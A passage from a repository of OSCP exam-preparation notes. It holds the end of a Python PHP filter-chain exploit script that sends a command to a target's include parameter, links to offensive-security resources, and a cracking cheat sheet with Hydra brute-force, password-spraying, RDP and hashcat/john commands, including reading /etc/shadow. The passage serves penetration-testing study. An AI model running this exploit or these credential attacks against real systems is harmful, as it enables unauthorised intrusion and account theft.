 53 |     'x': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1254.ISO-IR-226|convert.iconv.CSMACINTOSH.IBM-1149|convert.iconv.EBCDICESA.UCS4|convert.iconv.1026.UTF-32LE',
 54 |     'y': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.EBCDIC-INT1.IBM-1399',
 55 |     'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
 56 |     'A': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-111.IBM1130|convert.iconv.L1.ISO-IR-156',
 57 |     'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
 58 |     'C': 'convert.iconv.UTF8.CSISO2022KR',
 59 |     'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
 60 |     'E': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.LATIN7.MACINTOSH|convert.iconv.CSN_369103.CSIBM1388',
 61 |     'F': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9448.ISO-IR-103|convert.iconv.ISO-IR-199.T.61|convert.iconv.IEC_P27-1.CP937',
 62 |     'G': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_8859-3:1988.CP1142|convert.iconv.CSIBM16804.CSIBM1388',
 63 |     'H': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.EUCJP-OPEN|convert.iconv.CP5347.CP1144',
 64 |     'I': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.DS2089|convert.iconv.OSF0004000A.CP852|convert.iconv.HPROMAN8.T.618BIT|convert.iconv.862.CSIBM1143',
 65 |     'J': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.US.ISO-8859-13|convert.iconv.CP9066.CSIBM285',
 66 |     'K': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1097.UTF-16BE',
 67 |     'L': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ECMACYRILLIC.IBM256|convert.iconv.GEORGIAN-ACADEMY.10646-1:1993|convert.iconv.IBM-1122.IBM920',
 68 |     'M': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.SE2.ISO885913|convert.iconv.866NAV.ISO2022JP2|convert.iconv.CP857.CP930',
 69 |     'N': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM9066.UTF7|convert.iconv.MIK.CSIBM16804',
 70 |     'O': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-197.CSIBM275|convert.iconv.IBM1112.UTF-16BE|convert.iconv.ISO_8859-3:1988.CP500',
 71 |     'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
 72 |     'Q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NO.CP275|convert.iconv.EBCDIC-GREEK.CP936|convert.iconv.CP922.CP1255|convert.iconv.MAC-IS.EBCDIC-CP-IT',
 73 |     'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
 74 |     'S': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1154.UCS4',
 75 |     'T': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1163.CP1388|convert.iconv.OSF10020366.MS-MAC-CYRILLIC|convert.iconv.ISO-IR-25.ISO-IR-85|convert.iconv.GREEK.IBM-1144',
 76 |     'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
 77 |     'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
 78 |     'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
 79 |     'X': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF10020388.IBM-935|convert.iconv.CP280.WINDOWS-1252|convert.iconv.CP284.IBM256|convert.iconv.CP284.LATIN1',
 80 |     'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
 81 |     'Z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.CSEBCDICFISE',
 82 |     '+': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ANSI_X3.4-1986.CP857|convert.iconv.OSF10020360.ISO885913|convert.iconv.EUCCN.UTF7|convert.iconv.GREEK7-OLD.UCS4',
 83 |     '=': ''
 84 | }
 85 | 
 86 | 
 87 | # generate some garbage base64
 88 | filters = "convert.iconv.UTF8.CSISO2022KR|"
 89 | filters += "convert.base64-encode|"
 90 | # make sure to get rid of any equal signs in both the string we just generated and the rest of the file
 91 | filters += "convert.iconv.UTF8.UTF7|"
 92 | 
 93 | 
 94 | for c in base64_payload[::-1]:
 95 |         filters += conversions[c] + "|"
 96 |         # decode and reencode to get rid of everything that isn't valid base64
 97 |         filters += "convert.base64-decode|"
 98 |         filters += "convert.base64-encode|"
 99 |         # get rid of equal signs
100 |         filters += "convert.iconv.UTF8.UTF7|"
101 | 
102 | filters += "convert.base64-decode"
103 | 
104 | final_payload = f"php://filter/{filters}/resource={args.file}"
105 | 
106 | '''  
107 | proxies = {
108 |   "http": "socks5://127.0.0.1:1080",
109 | }
110 | '''
111 | r = requests.get(args.url, params={
112 |     "0": args.command,
113 |     "action": "include",
114 |     args.parameter: final_payload              
115 | })
116 | 
117 | print(r)
118 | print(r.text)
119 | 


--------------------------------------------------------------------------------
/Resources/ResourceDump.md:
--------------------------------------------------------------------------------
  1 | 
  2 | ## Practice 
  3 | ### Boxes     
  4 | https://academy.hackthebox.eu/  
  5 | https://hackthebox.eu/  
  6 | https://tryhackme.com/
  7 | https://pwn.college/  
  8 | 
  9 | ### CTFs
 10 | https://picoctf.com/    
 11 | https://ctftime.org/event/list/upcoming   
 12 | http://captf.com/calendar/   
 13 | 
 14 | ### Wargames 
 15 | [Micro Corruption](https://microcorruption.com/login)      
 16 | [SmashTheStack](http://www.smashthestack.org/)    
 17 | [OverTheWire](https://overthewire.org/wargames/)   
 18 | [Exploit Exercises](http://exploit-exercises.com/)    
 19 | 
 20 | ### Coding   
 21 | https://www.codewars.com/  
 22 | https://www.sololearn.com/home   
 23 | https://www.codecademy.com/   
 24 | 
 25 | 
 26 | ## Repos  
 27 | [OSCP - Hacker's stop](https://hackerstop.org/oscp)  
 28 | [Payloadallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings)     
 29 | [seclists](https://github.com/danielmiessler/SecLists)    
 30 | [Purple Team Resources](https://github.com/ch33r10/EnterprisePurpleTeaming)  
 31 | [5 Pillars to become a Cyber Security Professional](https://github.com/DFIRmadness/5pillars/blob/master/5-Pillars.md)  
 32 | [Vulnhub Resources](https://www.vulnhub.com/resources/)  
 33 | [Red Tem Resources](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming)   
 34 | [Art of Hacking Repo](https://github.com/The-Art-of-Hacking/h4cker) 
 35 | [Pentesting Bible](https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE)   
 36 | 
 37 | ## Books   
 38 | [Goalkicker books](https://books.goalkicker.com/)   
 39 | [Red Team Field Manual](https://doc.lagout.org/rtfm-red-team-field-manual.pdf)   
 40 | [Hack Tricks](https://book.hacktricks.xyz/)  
 41 | [Dostoevskylabs's PenTest Notes](https://dostoevskylabs.gitbooks.io/dostoevskylabs-pentest-notes/)  
 42 | [Ebook Repo](https://github.com/Scr1ptK1ddie/CySecBooks)  
 43 | 
 44 | ## Blogs  
 45 | [Trusted Security](https://www.trustedsec.com/blog/)   
 46 | [Hacking Passion](https://hackingpassion.com/) 
 47 | 
 48 | ## Podcasts    
 49 | [Hack the Planet](https://www.youtube.com/watch?v=xewv122qxnk)   
 50 | 
 51 | ## Videos  
 52 | [The Cyber Mentor Youtube](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)  
 53 | [DEFCON Youtube](https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw)   
 54 | [IppSec Youtube](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)  
 55 | [nahamsec Youtube](https://www.youtube.com/nahamsec)   
 56 | [John Hammond](https://www.youtube.com/johnhammond010)   
 57 | [Pwn function](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)  
 58 | [PC Secuirty](https://www.youtube.com/user/ThePCSecurity) 
 59 | 
 60 | ## Cheat sheets  
 61 | [Highoncoffee cheat sheet's](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)   
 62 | [Huge list of cheat sheets](https://www.reddit.com/r/cybersecurity/comments/iu17uu/cybersec_cheat_sheets_in_all_flavors_huge_list/)      
 63 | [noobsec OSCP cheatsheet](https://www.noobsec.net/oscp-cheatsheet/)       
 64 | [ceso oscp cheatsheet](https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/) 
 65 | 
 66 | ## Services 
 67 | [What is Enumeration?](http://resources.infosecinstitute.com/what-is-enumeration/)    
 68 | [Common services](http://www.opsschool.org/common_services.html)  
 69 | 
 70 | ### DNS Port 53 (Basics of DNS and DNS enum, DNS Zone Transfers) 
 71 | Possible misconfigurations and attack vectors  
 72 | [DNS 101](http://www.opsschool.org/dns_101.html)  
 73 | [DNS 201](http://www.opsschool.org/dns_201.html)  
 74 | [DNS Hacking (Beginner to Advanced)](http://resources.infosecinstitute.com/dns-hacking/)  
 75 | [An Intro to DNS](https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts)   
 76 | [DNS Enum](https://resources.infosecinstitute.com/topic/dns-enumeration-techniques-in-linux/#gref)  
 77 | 
 78 | ## Tools 
 79 | **Password Cracking**  
 80 | [DEF CON Password Cracking Village - Password Cracking 101](https://passwordvillage.org/general.html#hashing_vs_encryption)   
 81 | 
 82 | ### NMAP Port Scanning (TCP Connect Scan, UDP Scanning, Using NSE Scripts)   
 83 | /usr/share/nmap/scripts 
 84 | [Hacking Articles:NMAP](http://www.hackingarticles.in/category/nmap/)  
 85 | [NMAP - Port-Scanning: A Practical Approach Modified for better](https://www.exploit-db.com/papers/35425/)   
 86 | [nmap cheat sheet](https://highon.coffee/blog/nmap-cheat-sheet/) 
 87 | [nmap: RTFM](https://blog.zsec.uk/nmap-rtfm/)   
 88 | 
 89 | ### Wireshark (Capture and display filters, filters)    
 90 | [Network Hacking 101](https://www.notion.so/Network-Hacking-101-f9137337b4854b6894753df338a3942f)   
 91 | 
 92 | ### TCPDump (Filtering Traffic, Advanced header filtering) 
 93 | [tcpdump cheat sheet](https://packetlife.net/media/library/12/tcpdump.pdf) 
 94 | [Tcpdump tutorial](https://danielmiessler.com/study/tcpdump/)   
 95 | 
 96 | ### Reverse and Bind shell, Transferring Files, Types of shells(tty,pty)  
 97 | [Netcat Tutorials for Beginner](http://www.hackingarticles.in/netcat-tutorials-beginner/)  
 98 | [Reverse Shell Cheat Sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)  
 99 | [Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)  
100 | [7 Linux Shells Using Built-in Tools](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)        
101 | [Spawning a TTY Shell](https://netsec.ws/?p=337)  
102 | [Upgrading simple shells to fully interactive TTYs](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)  
103 | [Transferring Files from Linux to Windows (post-exploitation)](https://blog.ropnop.com/transferring-files-from-kali-to-windows/)  
104 | [Netcat without -e? No Problem!](https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/)  
105 | [Socat cheat sheet](https://www.redhat.com/sysadmin/getting-started-socat) 
106 | 
107 | ### Metasploit  
108 | [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)  
109 | [Creating Metasploit Payloads](https://netsec.ws/?p=331)  
110 | [AV Evasion With Metasploit paper](https://www.rapid7.com/globalassets/_pdfs/whitepaperguide/rapid7-whitepaper-metasploit-framework-encapsulating-av-techniques.pdf/) [Porting Ruby to Python](https://ivanitlearning.wordpress.com/2019/09/01/rewriting-a-ruby-msf-exploit-in-python/)
111 | [Converting a Metasploit Module](https://www.shellcode.it/article/convert-msf-module/) 
112 | 
113 | ### Recon-NG   
114 | [Recon cheat sheet](https://pentester.land/cheatsheets/2019/04/15/recon-resources.html) 
115 | [Intro to Recon-ng](https://warroom.securestate.com/recon-ng-tutorial/)  
116 | [Recon-ng: Usage Guide](https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Usage%20Guide)    
117 | 
118 | ### OtherOSINT Tools 
119 | [Tool Collection](https://cipher387.github.io/osint_stuff_tool_collection/)    
120 | [OSINT Resources](http://bib.opensourceintelligence.biz/?mc_cid=35d30a0dff&mc_eid=4ab251d459) 
121 | [Shodan Cheatsheet](https://thedarksource.com/shodan-cheat-sheet/) 
122 | 
123 | ## Web App Pentesting   
124 | [OWASP Top 10](https://owasp.org/www-project-web-security-testing-guide/)   
125 | [Art of Web App Pen Testing](https://github.com/The-Art-of-Hacking/h4cker/tree/master/web_application_testing)   
126 | 
127 | ### 1. LFI(LFI to RCE)  
128 | [LFI Cheat Sheet](https://highon.coffee/blog/lfi-cheat-sheet/)  
129 | [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)  
130 | [5 ways to Exploit LFi Vulnerability](http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/)  
131 | ### 3. SQL Injection (SQLi to RCE)  
132 | [Full SQL Injection Tutorial (MySQL)](https://www.exploit-db.com/papers/13045/)  
133 | [Client Side Attacks](https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/)  
134 | 
135 | ## Post Shell 
136 | [Fixing Exploits](https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/) 
137 | [Modern Binary Exploitation](http://security.cs.rpi.edu/courses/binexp-spring2015/)  
138 | 
139 | ### Privilege Escalation     
140 | [This challenge was built to promote the Windows / Linux Local Privilege](https://github.com/sagishahar/challenges#k2)        
141 | [MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux](https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/)   
142 | 
143 | Linux Privilige Escalation  
144 | [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)  
145 | [A GUIDE TO LINUX PRIVILEGE ESCALATION by Rashid Feroz](https://payatu.com/guide-linux-privilege-escalation/) 
146 | [Attack and Defend: Linux Privilege Escalation Whitepaper](https://sansorg.egnyte.com/dl/QQOaGDIeFM/?)  
147 | Techniques of 2016](https://www.sans.org/reading-room/whitepapers/linux/attack-defend-linux-privilege-escalation-techniques-2016-37562)   
148 | [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790)  
149 | 
150 | Windows Privilige Escalation  
151 | [Elevating privileges by exploiting weak folder permissions](http://www.greyhathacker.net/?p=738)  
152 | [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)  
153 | [Windows Privilege Escalation Commands](http://pwnwiki.io/#!privesc/windows/index.md)  
154 | [Windows 10 - Task Scheduler - Priv Esc Thru DLL Planting](http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html) 
155 | [DLL Proxying](https://itm4n.github.io/dll-proxying/)   
156 | [Windows Process Injection](https://i.blackhat.com/USA-19/Thursday/us-19-Kotler-Process-Injection-Techniques-Gotta-Catch-Them-All-wp.pdf) |  [Video for Talk](https://www.youtube.com/watch?v=xewv122qxnk)   
157 | [Process Injection Fundamentals](https://blog.thecybersecuritytutor.com/process-injection-fundamentals/)  
158 | [Active Directory](https://adsecurity.org/)  
159 | 			 
160 | ### Pivoting / Tunneling      
161 | [SSH Tunneling Explained](https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/)      
162 | [Port Forwarding in Windows](http://woshub.com/port-forwarding-in-windows/)    
163 | [Tunneling, Pivoting, and Web Application Penetration Testing](https://www.sans.org/white-papers/36117/) 
164 | 
165 | ### Post Exploitation   
166 | [PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained.](http://pwnwiki.io)    
167 | [Mimikatz whitepaper](https://sansorg.egnyte.com/dl/XMHRwR5lRO/?)   
168 | 
169 | ## Cyber Career 
170 | https://www.cyberhuntingguide.net/  
171 | 
172 | 


--------------------------------------------------------------------------------
/Cracking.md:
--------------------------------------------------------------------------------
  1 | # Cracking 
  2 | Cracking service logins and password hashes. 
  3 | ## Contents
  4 | - [Cracking](#cracking)
  5 |   * [Contents](#contents)
  6 |   * [References](#references)
  7 |   * [Tools](#tools)
  8 |   * [Wordlists](#wordlists)
  9 | - [Cracking Services](#cracking-services)
 10 |   * [Default Credentials](#default-credentials)
 11 |   * [Hydra](#hydra)
 12 |   * [Burp Suite](#burp-suite)
 13 |   * [RDP with Crowbar](#rdp-with-crowbar)
 14 |   * [Misc Service Crackers](#misc-service-crackers)
 15 | - [Cracking Offline Passwords](#cracking-offline-passwords)
 16 |   * [Hashcat](#hashcat)
 17 |     + [Benchmark Test (Hash Type)](#benchmark-test--hash-type-)
 18 |     + [Show Example Hash](#show-example-hash)
 19 |     + [Dictionary Attack](#dictionary-attack)
 20 |     + [Mask Attack](#mask-attack)
 21 |     + [Increment](#increment)
 22 |     + [Cracking Linux Passwords](#cracking-linux-passwords)
 23 |     + [Cracking krb5ts Keys](#cracking-krb5ts-keys)
 24 |     + [Cracking Asrep keys](#cracking-asrep-keys)
 25 |   * [John the Ripper](#john-the-ripper)
 26 |     + [Windows:](#windows-)
 27 |     + [Linux](#linux)
 28 |     + [SQLMap Output](#sqlmap-output)
 29 | 
 30 | ## References 
 31 | [Cracking the Hashes](https://zweilosec.gitbook.io/hackers-rest/os-agnostic/password-cracking/cracking-the-hashes)   
 32 | [Name That Hash](https://nth.skerritt.blog/) to identify a hash type.     
 33 | [John the Ripper Cheatsheet](https://4n3i5v74.github.io/posts/cheatsheet-john-the-ripper/)    
 34 | [SkullSecurity Wiki Page](https://wiki.skullsecurity.org/index.php/Passwords)    
 35 | 
 36 | ## Tools
 37 | Passwords, login pages, etc.
 38 | [Ciphey](https://github.com/Ciphey/Ciphey)  
 39 | [CyberChef](https://gchq.github.io/CyberChef/)  
 40 | 
 41 | ## Wordlists    
 42 | [Seclists](https://github.com/danielmiessler/SecLists)       
 43 | [Have I Been Pwned Passwords](https://haveibeenpwned.com/Passwords)   
 44 | [Rainbow Crack, Rainbow Tables](http://project-rainbowcrack.com/table.htm)   
 45 | [Rocktastic Mega Wordlist](https://labs.nettitude.com/tools/rocktastic/)  
 46 | [berzerk0 wordlist](https://www.hack3r.com/forum-topic/wikipedia-wordlist)   
 47 | [Weakpass](https://www.hack3r.com/forum-topic/wikipedia-wordlist)   
 48 | Make your own wordlist: [Crunch](https://sourceforge.net/projects/crunch-wordlist/)  [Cewl](https://github.com/digininja/cewl)  
 49 | [Kaonashi Wordlist](https://github.com/kaonashi-passwords/Kaonashi/tree/master)    
 50 | [Mega wordlist](https://github.com/Karmaz95/crimson_cracking)     
 51 | 
 52 | # Cracking Services   
 53 | ## Default Credentials
 54 |     Check Web Enumeration checklist for default CMS creds
 55 |     https://cirt.net/passwords
 56 |     https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
 57 | 
 58 | ## Hydra
 59 | [Brute Force Login Pages with Hydra](https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/)   
 60 | [Brute Forcing Services with Hydra](https://securitytutorials.co.uk/brute-forcing-passwords-with-thc-hydra/)  
 61 | ftp, ssh, rdp, http-post, http-get 
 62 | 
 63 |     hydra -l ftp -P passlist.txt ftp://10.10.x.x  
 64 |     hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v    
 65 |     hydra -e nsr -l username -P wordlist 10.10.10.10 service -s [port if not default]     
 66 |     -e nsr: tries no pass, same pass as usernames, passwords as backwords username  
 67 |     hydra -C creds_list 10.10.10.10 vnc     #use creds list in format user:password   
 68 | Password Spray a List of IPs (1 on each line IP:port if needed)    
 69 | 
 70 |     hydra -M servers.list -C creds.txt ssh    
 71 | http-get 
 72 | 
 73 |     hydra -L user.txt -P wordlist.txt 10.10.10.10 http-get /directory_path  
 74 |     hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f   
 75 |     
 76 | http-post
 77 | 
 78 |     intercept request in burp - see body. No response - :S=302    
 79 |     hydra 10.10.10.10 http-form-post "/index.php:user=admin&pass=^PASS^:INVALID LOGIN MSG" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f  
 80 |     
 81 | ## Burp Suite 
 82 | [Brute forcing web login pages with intruder](https://portswigger.net/support/using-burp-to-brute-force-a-login-page)  
 83 | Look for change in status code or change in length of header
 84 |     
 85 | ## RDP with Crowbar 
 86 | 
 87 |     crowbar -b rdp -s 10.10.10.10 -u admin -C rockyou.txt -n 1
 88 |     
 89 | ## Misc Service Crackers  
 90 | wpscan: crack wordpress logins     
 91 | [pwn Jenkins](https://github.com/gquere/pwn_jenkins): crack Jenkins service  
 92 | 
 93 | 
 94 | # Cracking Offline Passwords  
 95 | ## Online Hash Lookup    
 96 | [Identify Hash Type](https://www.tunnelsup.com/hash-analyzer/)       
 97 | [Name That Hash](https://nth.skerritt.blog/)   
 98 | [Search that Hash](https://github.com/HashPals/Search-That-Hash): search online sites then try with hashcat    
 99 |  
100 |     hash-identifier [hash]    
101 | 
102 | Online Hash Databases   
103 | [Crackstation](https://crackstation.net/): try first esp. with Windows hashes       
104 | [MD5Decrypt](https://md5decrypt.net/): look up MD5 hashes    
105 | [Hash Toolkit](https://hashtoolkit.com/): MD5, SHA1, SHA256, SHA512 hashes    
106 | [Cmd5](https://www.cmd5.org/): MD5, SHA1, MySQl and SHA256 hashes    
107 | [Online Hash Crack](https://www.onlinehashcrack.com/): Hashes, WPA2 captures, PDF, zips     
108 | 
109 | Note: Google Collab now does not allow instances to be used for password cracking, and will detect and block the use of password cracking software (blocks hashcat install).                
110 | Large wordlist - use google colab projects: [colabsth](https://github.com/vaishnavpardhi/colabsth/), or [penglab - Hashcat, John, Hydra](https://github.com/mxrch/penglab)   
111 | Google Collab alternatives: 
112 | [vast.ai](https://vast.ai/), [setup](https://www.scrawledsecurityblog.com/2020/11/cracking-password-hashes-on-cheap-how.html)              
113 |  
114 |  
115 | ## Hashcat 
116 | 
117 |     hashcat -m [mode] hashes wordlist   
118 |     
119 | Quick Reference:   
120 | 
121 |     potfile: hashcat.potfile, usually in ~/.hashcat/ on Kali.    
122 |     hashcat -m 1000 hashes.ntds --show --user   #see cracked hashes and usernames    
123 |     -a 0    #attack mode 0 for a wordlist attack should be good to crack most passwords      
124 |     -m 1000   #NT (most Windows passwords)   
125 |     -m 3000   #LANMAN (legacy Windows password hashes, very weak)    
126 |     -m 5500   #NTLMv1 (hashes captured from using a tool like Responder)     
127 |     -m 5600   #NTLMv2 (hashes captured from using a tool like Responder)     
128 |     
129 |     -m 1600   #MD5     
130 |     -m 500    #MD5 /etc/shadow and /etc/passwd combined       
131 |     -a 0 -r hashcat/rules/best64.rule # use standard rule file with a wordlist attack          
132 |     
133 | ### Benchmark Test (Hash Type)
134 | 
135 |     hashcat -b -m #type
136 | ### Show Example Hash 
137 | 
138 |     hashcat -m #type --example-hashes
139 | ### Dictionary Attack
140 | 
141 |     hashcat -a 0 -m #type hash.txt dict.txt
142 | 
143 | ### Dictionary and Rules Attack      
144 | dive.rule, best64.rule   
145 | [One rule to rule them all](https://github.com/NotSoSecure/password_cracking_rules)  
146 | 
147 | 
148 |     hashcat -a 0 -m #type hash.txt wordlist.txt -r rule.txt  
149 |     hashcat -m 1000 -a 0 hash.txt wordlist.txt -r best64.rule    #standard rule file used 
150 |     
151 |     
152 | ### Combination Attack   
153 | 
154 |     hashcat -a 1 -m #type hash.txt wordlist1.txt wordlist2.txt 
155 |    
156 |    
157 | ### Mask Attack
158 | 
159 | Windows minimum standard password complexity policy is often:    
160 | 
161 |     At least 8 characters in length   
162 |     At least one uppercase letter   
163 |     At least one lowercase letter    
164 |     At least one digit    
165 |     
166 | Markers to specifiy type of character:    
167 | 
168 |     ?l = abcdefghijklmnopqrstuvwxyz    
169 |     ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ    
170 |     ?d = 0123456789    
171 |     ?s = !"#$%&'()*+,-./:;<=>?@[]^_`{|}~   
172 |     ?a = ?l?u?d?s    
173 |     ?b = 0x00 - 0xff   
174 | 
175 | 
176 |     hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a   
177 |     hashcat -m 1000 -a 3 hashes.ntds ?u?l?l?l?l?l?l?d      #minimum Windows password policy    
178 | 
179 | ### Hybrid Dictionary and Mask   
180 | 
181 |     hashcat -a 6 -m #type hash.txt wordlist.txt ?a?a?a?a
182 | 
183 | ### Hybrid Mask and Dictionary    
184 | 
185 |     hashcat -a 7 -m #type hash.txt ?a?a?a?a wordlist.txt  
186 |    
187 | 
188 | ### Increment
189 | 
190 | Default Increment
191 | 
192 |     hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment
193 | 
194 | Increment Minimum Length
195 | 
196 |     hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4
197 | 
198 | Increment Max Lenth
199 | 
200 |     hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5
201 | 
202 | Session Restore 
203 | 
204 |     hashcat -a 0 -m #type --restore --session <uniq_name> hash.txt wordlist.txt
205 | 
206 | ### Cracking Linux Passwords  
207 | username:x or ! or password (older Unix):GECOS (for compatibility):hashtype: salt:hash   #format in /etc/shadow   
208 | Hashtypes:    
209 | 
210 |     $ : DES       $1  : MD5      $2 : Blowfish   $5 : SHA-256    $6 : SHA-512   
211 | 
212 | ### Cracking krb5ts Keys
213 | 
214 |     hashcat -m 13100 --force <TGSs_file> <passwords_file>
215 | 
216 | ### Cracking Asrep keys
217 | 
218 |     hashcat -a 0 -m 18200 <asrep_file> <password_file> 
219 | 
220 | ## John the Ripper    
221 | [John the Ripper Cheatsheet](https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf)      
222 | John is easier to user then hashcat - but slower and not as flexible. It will crack hashes of the first algorithim / hashtype seen in a file. Stores cracked passwords in ~/.john/john.pot by default.      
223 | Install newest version:     
224 | 
225 |     git clone https://github.com/openwall/john -b bleeding-jumbo /data/tools/john ; cd /data/tools/john/src/ ; ./configure && make -s clean && make -sj4 ; cd ~   
226 | Use rules:     
227 | 
228 |     john combined --format=md5crypt --wordlist=wordlist.txt --rules=Jumbo     
229 |     --rules=KoreLogic    
230 |     --rules=All      
231 | ### Windows:  
232 | Supply the text output from Impacket secretsdump.py, Mimikatz, Meterpreter as the file to crack hashes from.    
233 | 
234 |     john --format=nt hash.txt     #specify NT (default is LANMAN)    
235 |     --format=netntlm    #with Responder
236 |     --format=netntlmv2   #with Responder   
237 | 
238 | ### Linux    
239 | Copy /etc/passwd and /etc/shadow to local workstation, unshadow passwd shadow, crack hashes.   
240 | 
241 |     sudo unshadow /etc/passwd /etc/shadow > combined            
242 |     john combined   
243 | SHA512 hashes    
244 | 
245 |     john --wordlist=rockyou.txt --format=sha512crypt hashes        
246 | MD5 Hashes    
247 | 
248 |     john --format=NT --wordlist=rockyou.txt hashes          
249 |     
250 | ### SQLMap Output      
251 | 
252 |     john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/sqlmap*/sqlmap* --rules     
253 | 
254 | 


--------------------------------------------------------------------------------
/Report.md:
--------------------------------------------------------------------------------
  1 | # OSCP Exam Report   
  2 | ## Contents 
  3 | - [Reporting](#reporting)
  4 |   * [Contents](#contents)
  5 |   * [Tips](#tips)
  6 |   * [Resources](#resources)
  7 |   * [Sample Report](#sample-report)
  8 | 
  9 | ## Tips   
 10 | 1. Who is the target audience?
 11 | 2. A non-technical person should be able to understand (most of) the report.  
 12 | 3. Report should include the following: 
 13 | 	1. Executive Summary
 14 | 	2. Technical Summary
 15 | 	3. Detail Report of findings
 16 | 	4. Recommendations for remediation (if possible)
 17 | 
 18 | 
 19 | ## Resources
 20 | - https://blog.zsec.uk/ltr101-pentest-reporting/
 21 | - https://github.com/juliocesarfort/public-pentesting-reports
 22 | 
 23 | Public Pentesting Reports: 
 24 | - https://github.com/juliocesarfort/public-pentesting-reports
 25 | 
 26 | 
 27 | ## Sample Report 
 28 | From TJ Null's Note Taking Template [here](https://github.com/tjnull/TJ-JPT) 
 29 | 
 30 | # <div align="center"> Offensive Security Lab/Exam Penetration Test Report </div>
 31 | 
 32 | ## <div align="center">  student@emailaddress.com Student-ID </div>
 33 | 
 34 | ###### <div align="center"> 2020-XX-XX </div>
 35 | 
 36 | 
 37 | <div style="page-break-after: always;"></div>
 38 | 
 39 | ## Contents
 40 | 
